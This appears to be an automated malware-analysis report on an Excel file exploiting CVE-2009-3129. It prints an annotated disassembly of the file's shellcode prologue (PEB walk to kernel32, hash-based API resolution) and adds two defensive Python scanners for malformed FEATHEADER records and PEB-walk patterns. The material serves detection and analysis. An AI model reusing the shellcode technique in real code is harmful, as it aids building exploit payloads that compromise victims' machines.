MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
The critical CVE-2009-3129 heuristic indicates that this Excel file carries a malformed FEATHEADER record of the shape used to trigger memory corruption and code execution in Excel (the Featheader vulnerability fixed in MS09-067). The x86 shellcode found in the file walks the PEB to locate kernel32 and resolves APIs by hash, which is the standard prologue of an exploit payload, and the suspicious cmd.exe invocation suggests a follow-on action, likely downloading and executing a second stage. The embedded URLs are RDF/XMP namespace URIs and fragments of a PDF Info dictionary (Producer, ModDate) found in the OLE body; they point to PDF metadata carried inside the document rather than to command-and-control infrastructure, and only www.pdf-repair.com is worth recording as an indicator.
Heuristics (5)
- CVE-2009-3129 — Excel FEATHEADER record overflow (critical; CVE, exact match; tag CVE_2009_3129)
  The Workbook BIFF stream contains a FEATHEADER (Feature Header) record with anomalous size (record_size=22, isf=4, cbHdrData=4). Legitimate FEATHEADER records are tiny (<100 bytes) and carry cbHdrData values that fit in the record body; an oversized cbHdrData is the documented CVE-2009-3129 exploit primitive: it drives a memcpy with attacker-controlled size, leading to memory corruption and code execution in Excel 2007/2003. Note that the field values as reported are self-consistent (a cbHdrData of 4 fits in a 22-byte record, which has 7 bytes of rgbHdrData after the 15-byte fixed part: 8-byte frtHeaderOld, 2-byte isf, 1-byte reserved1, 4-byte cbHdrData), so confirm the raw record bytes in a hex view before treating this record as the trigger; the shellcode and slack findings below carry the verdict on their own.
- PEB access via FS segment, x86 (high; tag SC_PEB_ACCESS)
  Disassembly (attempted x86 opcode disassembly of the matched region, with the conventional reading of each step added):
    00000D0F 64a130000000    mov eax, dword ptr fs:[0x30]      ; eax = PEB
    00000D15 90              nop
    00000D16 8b400c          mov eax, dword ptr [eax + 0xc]    ; eax = PEB->Ldr
    00000D19 90              nop
    00000D1A 8b701c          mov esi, dword ptr [eax + 0x1c]   ; esi = Ldr->InInitializationOrderModuleList.Flink (first entry: ntdll)
    00000D1D ad              lodsd                             ; eax = [esi] = next entry (kernel32 on XP/2003)
    00000D1E 8b7008          mov esi, dword ptr [eax + 8]      ; esi = entry->DllBase
    00000D21 90              nop
    00000D22 e98b020000      jmp 0xfb2                         ; forward jump; 0xD27 below is reached by a call, the jmp/call/pop GetPC idiom
    00000D27 58              pop eax                           ; eax = return address pushed by that call (pointer to trailing data)
    00000D28 90              nop
    00000D29 81ec00020000    sub esp, 0x200                    ; 512-byte scratch frame
    00000D2F 8bfc            mov edi, esp                      ; edi = frame base
    00000D31 897708          mov dword ptr [edi + 8], esi      ; frame[0x08] = kernel32 base
    00000D34 894710          mov dword ptr [edi + 0x10], eax   ; frame[0x10] = GetPC pointer
    00000D37 ff7708          push dword ptr [edi + 8]          ; arg: module base
    00000D3A 68ec97030c      push 0xc0397ec                    ; arg: API name hash #1
    00000D3F e81a020000      call 0xf5e                        ; resolve export by hash
    00000D44 89471c          mov dword ptr [edi + 0x1c], eax   ; frame[0x1c] = API #1
    00000D47 ff7708          push dword ptr [edi + 8]
    00000D4A 68f622b97c      push 0x7cb922f6                   ; hash #2
    00000D4F e80a020000      call 0xf5e
    00000D54 90              nop
    00000D55 894720          mov dword ptr [edi + 0x20], eax   ; frame[0x20] = API #2
    00000D58 ff7708          push dword ptr [edi + 8]
    00000D5B 68a517007c      push 0x7c0017a5                   ; hash #3
    00000D60 e8f9010000      call 0xf5e
    00000D65 894724          mov dword ptr [edi + 0x24], eax   ; frame[0x24] = API #3
    00000D68 ff7708          push dword ptr [edi + 8]
    00000D6B 68              .byte 0x68                        ; opcode of a fourth push imm32; the region ends inside its immediate
    00000D6C fb              sti                               ; \
    00000D6D 97              xchg edi, eax                     ;  > almost certainly the first bytes of that cut-off immediate, not code
    00000D6E fd              std                               ; /
  The first seven instructions are the textbook kernel32 locator: the second entry of InInitializationOrderModuleList is kernel32.dll on Windows XP/2003 (on Vista and later it is KernelBase.dll, so this stub is XP-era, consistent with the Excel 2003/2007 target). The interleaved nops are padding to break byte signatures. What follows is a hash-based export resolver: each API is looked up by calling the routine at 0xf5e with the module base and a 32-bit hash; the hash algorithm and the three resolved names are not recoverable from this excerpt and would need the routine at 0xf5e to be examined.
- Suspicious cmd.exe invocation with execution flag (high; tag SC_STR_CMD)
- OLE document has large unaccounted-for region (high; tag OLE_SLACK_ANOMALY)
  The OLE file is 261,182 bytes but its declared streams total only 24,565 bytes; 236,617 bytes (91%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Embedded URL (info; tag EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.pdf-repair.com  (in document text, OLE body)
  - http://www.pdf-repair.com)/Producer(Advanced  (in document text, OLE body)
  - http://www.pdf-repair.com)/ModDate(D:20100406171120+08  (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#  (in document text, OLE body)
  - http://ns.adobe.com/pdf/1.3/  (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/  (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/  (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/  (in document text, OLE body)
  The second and third entries are over-captures: the extractor ran past the closing parenthesis into the neighbouring PDF Info dictionary keys (/Producer, /ModDate), so the underlying URL is http://www.pdf-repair.com in all three cases. The remaining five are standard RDF, XMP and Dublin Core namespace URIs. Together they show PDF metadata (an Info dictionary and an XMP packet) carried in the OLE body rather than network infrastructure; the one hostname worth recording is www.pdf-repair.com, and it should be checked rather than assumed to be C2.
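The FEATHEADER heuristic above reduces to one check over the Workbook BIFF record stream: does the declared cbHdrData fit in the bytes the record actually carries? The following is an added example, not the analyzer's code. It walks BIFF8 records (2-byte type, 2-byte length, payload), decodes the FeatHdr layout from MS-XLS (8-byte frtHeaderOld, 2-byte isf, 1-byte reserved1, 4-byte cbHdrData, then rgbHdrData) and flags any record whose cbHdrData exceeds the rgbHdrData bytes present. The sample stream is constructed; the 0xFFFFFFFF length is an illustrative impossible value, not a value taken from the file in this report. Extracting the Workbook stream from the OLE container (for example with olefile) is left out.

```python
"""Scan a BIFF8 Workbook stream for FeatHdr (FEATHEADER, 0x0867) records whose
declared cbHdrData cannot fit in the record body. Added example; not the
analyzer's code. Sample records are constructed."""
import struct

BOF, EOF, FEATHEADR = 0x0809, 0x000A, 0x0867
# FeatHdr fixed part (MS-XLS 2.4.112): frtHeaderOld(8) + isf(2) + reserved1(1) + cbHdrData(4)
FEATHDR_FIXED = 8 + 2 + 1 + 4


def biff_record(rtype: int, payload: bytes) -> bytes:
    """BIFF record = 2-byte type, 2-byte length, payload (all little-endian)."""
    return struct.pack("<HH", rtype, len(payload)) + payload


def feathdr_record(isf: int, cb_hdr_data: int, hdr_data: bytes) -> bytes:
    """Build a FeatHdr record; cb_hdr_data is written as declared, not derived."""
    frt_header_old = struct.pack("<HHI", FEATHEADR, 0, 0)     # rt, grbitFrt, reserved
    body = frt_header_old + struct.pack("<HBI", isf, 0, cb_hdr_data) + hdr_data
    return biff_record(FEATHEADR, body)


def iter_biff_records(stream: bytes):
    """Yield (offset, type, payload); a truncated trailing record is yielded short."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        yield off, rtype, stream[off + 4:off + 4 + rlen]
        off += 4 + rlen


def check_feathdr(payload: bytes) -> dict:
    """Compare declared cbHdrData with the rgbHdrData bytes actually present."""
    info = {"record_size": len(payload)}
    if len(payload) < FEATHDR_FIXED:
        info.update(anomalous=True, reason="record shorter than the 15-byte fixed part")
        return info
    isf = struct.unpack_from("<H", payload, 8)[0]
    cb = struct.unpack_from("<I", payload, 11)[0]
    available = len(payload) - FEATHDR_FIXED
    info.update(isf=isf, cbHdrData=cb, available=available)
    if cb > available:
        info.update(anomalous=True,
                    reason=f"cbHdrData {cb:#x} exceeds the {available} rgbHdrData bytes present")
    else:
        info.update(anomalous=False, reason="cbHdrData fits in the record")
    return info


def scan_workbook(stream: bytes):
    """Return [(offset, info)] for every FeatHdr record in the stream."""
    return [(off, check_feathdr(p))
            for off, t, p in iter_biff_records(stream) if t == FEATHEADR]


# Constructed stream: BOF, a well-formed FeatHdr, a FeatHdr with an impossible
# declared length (illustrative value, not taken from the file in this report), EOF.
SAMPLE_STREAM = (
    biff_record(BOF, bytes(16))
    + feathdr_record(isf=2, cb_hdr_data=4, hdr_data=b"\x00" * 4)
    + feathdr_record(isf=4, cb_hdr_data=0xFFFFFFFF, hdr_data=b"A" * 7)
    + biff_record(EOF, b"")
)

if __name__ == "__main__":
    for off, info in scan_workbook(SAMPLE_STREAM):
        print(f"{off:#06x} {info}")
```

Run against the values the report prints (record_size=22, cbHdrData=4) this check would not fire, which is exactly why the raw record is worth a look before the CVE label is relied on.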
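The PEB-access finding above is a byte-pattern match with a follow-on chain. Added example, not the analyzer's own logic: it scans a blob for the x86 "mov r32, fs:[0x30]" encodings (the short eax form used in the listing, the modrm absolute form, and the register-relative form that follows xor r32,r32), then looks within a short window for the Ldr (+0xc) and module-list (+0xc/+0x14/+0x1c) dereferences, tolerating the interleaved nops seen in the disassembly. The first sample is the opcode bytes from the report's disassembly; the second is a constructed xor/fs:[eax+0x30] variant. The 32-byte window and the confidence labels are my choices.

```python
"""Find x86 PEB-walk shellcode prologues (fs:[0x30] -> Ldr -> module list)
in an arbitrary byte blob. Added example, not the analyzer's own logic."""

LDR_OFFSET = 0x0C                     # PEB.Ldr
MODULE_LISTS = {                       # PEB_LDR_DATA list heads (x86 offsets)
    0x0C: "InLoadOrderModuleList",
    0x14: "InMemoryOrderModuleList",
    0x1C: "InInitializationOrderModuleList",
}
WINDOW = 32                            # bytes after the PEB load to look for the chain (assumption)


def peb_load_at(blob: bytes, i: int):
    """Return (length, dst_reg) if a 'mov r32, fs:[0x30]' form starts at blob[i].

    Recognised encodings:
      64 a1 30 00 00 00        mov eax, fs:[0x30]         (short form, as in the listing)
      64 8b /r disp32=0x30     mov r32, fs:[0x30]         (mod=00, rm=101)
      64 8b /r disp8=0x30      mov r32, fs:[r32+0x30]     (mod=01; preceded by xor r32,r32)
    x64 shellcode uses gs:[0x60] instead and is deliberately not matched here.
    """
    if blob[i] != 0x64:
        return None
    b = blob[i + 1:i + 8]
    if b[:1] == b"\xa1" and b[1:5] == b"\x30\x00\x00\x00":
        return 6, 0
    if b[:1] == b"\x8b" and len(b) >= 3:
        modrm = b[1]
        mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
        if mod == 0 and rm == 5 and b[2:6] == b"\x30\x00\x00\x00":
            return 7, reg
        if mod == 1 and rm != 4 and b[2] == 0x30:
            return 4, reg
    return None


def mov_reg_disp8(blob: bytes, i: int):
    """Decode 'mov r32, [r32+disp8]' (8b /r, mod=01, no SIB) at blob[i]."""
    if i + 3 > len(blob) or blob[i] != 0x8B:
        return None
    modrm = blob[i + 1]
    if modrm >> 6 != 1 or modrm & 7 == 4:
        return None
    return (modrm >> 3) & 7, modrm & 7, blob[i + 2]


def find_peb_walks(blob: bytes, window: int = WINDOW):
    """Return one finding per PEB load, with the Ldr/module-list follow-ups if seen."""
    hits = []
    i = 0
    while i < len(blob):
        m = peb_load_at(blob, i)
        if m is None:
            i += 1
            continue
        length, reg = m
        ldr_at = module_list = None
        for j in range(i + length, min(len(blob), i + length + window)):
            r = mov_reg_disp8(blob, j)
            if r is None:
                continue
            _dst, _base, disp = r
            if ldr_at is None and disp == LDR_OFFSET:
                ldr_at = j                               # reg = PEB->Ldr
            elif ldr_at is not None and disp in MODULE_LISTS:
                module_list = (j, MODULE_LISTS[disp])    # reg = list head Flink
                break
        hits.append({
            "offset": i,
            "peb_reg": reg,
            "ldr_at": ldr_at,
            "module_list": module_list,
            "confidence": "high" if module_list else ("medium" if ldr_at else "low"),
        })
        i += length
    return hits


# Opcode bytes from the report's disassembly (0xD0F..0xD26), surrounded by padding.
SAMPLE_FROM_REPORT = b"\x90" * 8 + bytes.fromhex(
    "64a130000000" "90" "8b400c" "90" "8b701c" "ad" "8b7008" "90" "e98b020000"
) + b"\x00" * 8

# Constructed variant: xor eax,eax / mov eax,fs:[eax+0x30] / Ldr / InMemoryOrderModuleList.
SAMPLE_XOR_FORM = bytes.fromhex("31c0" "648b4030" "8b400c" "8b7014" "ad" "96" "ad" "8b5810")

if __name__ == "__main__":
    for name, blob in (("report", SAMPLE_FROM_REPORT), ("xor-form", SAMPLE_XOR_FORM)):
        for h in find_peb_walks(blob):
            print(name, h)
```

A lone fs:[0x30] read is weak evidence (benign code reads the PEB too); the Ldr and module-list dereferences within a few bytes are what make the pattern shellcode-specific, which is why the confidence label depends on them.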